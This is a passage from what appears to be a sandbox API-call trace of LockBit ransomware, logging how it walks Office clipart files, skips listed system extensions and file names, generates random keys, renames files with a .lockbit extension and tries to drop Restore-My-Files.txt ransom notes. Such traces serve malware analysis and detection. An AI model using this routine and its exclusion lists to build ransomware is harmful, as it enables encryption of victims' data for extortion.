office\\clipart\\pub60cor\\tr00116_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0179.557] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.557] malloc (_Size=0x40068) returned 0x1ff1e60 [0179.557] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=9660) returned 1 [0179.557] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.557] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0179.557] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.558] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0179.558] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.562] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00116_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00116_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.562] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.562] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.564] free (_Block=0x1fa2ed8) [0179.564] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00116_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.564] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.564] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.564] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36ebde00, ftCreationTime.dwHighDateTime=0x1bf3bda, ftLastAccessTime.dwLowDateTime=0x5ae8f450, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x36ebde00, ftLastWriteTime.dwHighDateTime=0x1bf3bda, nFileSizeHigh=0x0, nFileSizeLow=0x1234, dwReserved0=0x0, dwReserved1=0x0, cFileName="TR00126_.WMF", cAlternateFileName="")) returned 1 [0179.564] lstrcmpiW (lpString1=".", lpString2="TR00126_.WMF") returned -1 [0179.564] lstrcmpiW (lpString1="..", lpString2="TR00126_.WMF") returned -1 [0179.564] PathFindExtensionW (pszPath="TR00126_.WMF") returned=".WMF" [0179.564] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.564] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.564] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.564] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.564] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.564] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.564] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.564] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.565] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.565] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TR00126_.WMF") returned -1 [0179.566] lstrcmpiW (lpString1="ntldr", lpString2="TR00126_.WMF") returned -1 [0179.566] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TR00126_.WMF") returned -1 [0179.566] lstrcmpiW (lpString1="bootsect.bak", lpString2="TR00126_.WMF") returned -1 [0179.566] lstrcmpiW (lpString1="autorun.inf", lpString2="TR00126_.WMF") returned -1 [0179.566] lstrcmpiW (lpString1="thumbs.db", lpString2="TR00126_.WMF") returned -1 [0179.566] lstrcmpiW (lpString1="iconcache.db", lpString2="TR00126_.WMF") returned -1 [0179.566] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.566] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00126_.WMF") returned=".WMF" [0179.566] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.566] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.566] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.567] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.567] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00126_.WMF.lockbit") returned 72 [0179.567] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00126_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00126_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0179.568] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.569] malloc (_Size=0x40068) returned 0x3df0008 [0179.569] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4660) returned 1 [0179.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.569] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.569] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.569] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.595] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00126_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00126_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.595] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.595] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0179.596] free (_Block=0x1fa2ed8) [0179.596] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00126_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.596] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.596] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.596] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x373d6f00, ftCreationTime.dwHighDateTime=0x1bd4b03, ftLastAccessTime.dwLowDateTime=0x5ae8f450, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x373d6f00, ftLastWriteTime.dwHighDateTime=0x1bd4b03, nFileSizeHigh=0x0, nFileSizeLow=0x235c, dwReserved0=0x0, dwReserved1=0x0, cFileName="TR00172_.WMF", cAlternateFileName="")) returned 1 [0179.596] lstrcmpiW (lpString1=".", lpString2="TR00172_.WMF") returned -1 [0179.596] lstrcmpiW (lpString1="..", lpString2="TR00172_.WMF") returned -1 [0179.596] PathFindExtensionW (pszPath="TR00172_.WMF") returned=".WMF" [0179.596] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.596] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.609] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.609] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.610] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.610] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.610] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.610] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.610] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.610] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.610] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.610] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.610] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.610] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.610] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.611] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.611] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.611] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.611] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.611] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.611] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.611] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.611] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.612] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.612] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.612] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.612] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.612] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.612] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.612] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.612] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.613] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.613] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.613] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.613] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.613] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.613] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.613] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.613] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.613] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.623] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.623] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.623] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.623] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.623] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.623] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.623] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.623] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TR00172_.WMF") returned -1 [0179.623] lstrcmpiW (lpString1="ntldr", lpString2="TR00172_.WMF") returned -1 [0179.623] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TR00172_.WMF") returned -1 [0179.623] lstrcmpiW (lpString1="bootsect.bak", lpString2="TR00172_.WMF") returned -1 [0179.623] lstrcmpiW (lpString1="autorun.inf", lpString2="TR00172_.WMF") returned -1 [0179.623] lstrcmpiW (lpString1="thumbs.db", lpString2="TR00172_.WMF") returned -1 [0179.624] lstrcmpiW (lpString1="iconcache.db", lpString2="TR00172_.WMF") returned -1 [0179.624] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.624] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00172_.WMF") returned=".WMF" [0179.625] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.625] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.625] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.625] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00172_.WMF.lockbit") returned 72 [0179.625] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00172_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0179.626] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.626] malloc (_Size=0x40068) returned 0x3df0008 [0179.626] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9052) returned 1 [0179.626] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.627] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.627] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.627] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.627] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.629] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00172_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00172_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.629] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.629] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.630] free (_Block=0x1fa2ed8) [0179.630] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00172_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.630] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.630] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.630] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75ca2e00, ftCreationTime.dwHighDateTime=0x1bd4af1, ftLastAccessTime.dwLowDateTime=0x5ae8f450, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x75ca2e00, ftLastWriteTime.dwHighDateTime=0x1bd4af1, nFileSizeHigh=0x0, nFileSizeLow=0x2142, dwReserved0=0x0, dwReserved1=0x0, cFileName="TR00178_.WMF", cAlternateFileName="")) returned 1 [0179.630] lstrcmpiW (lpString1=".", lpString2="TR00178_.WMF") returned -1 [0179.630] lstrcmpiW (lpString1="..", lpString2="TR00178_.WMF") returned -1 [0179.630] PathFindExtensionW (pszPath="TR00178_.WMF") returned=".WMF" [0179.630] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.630] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.630] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.630] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.630] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.630] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.630] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.631] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.631] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") 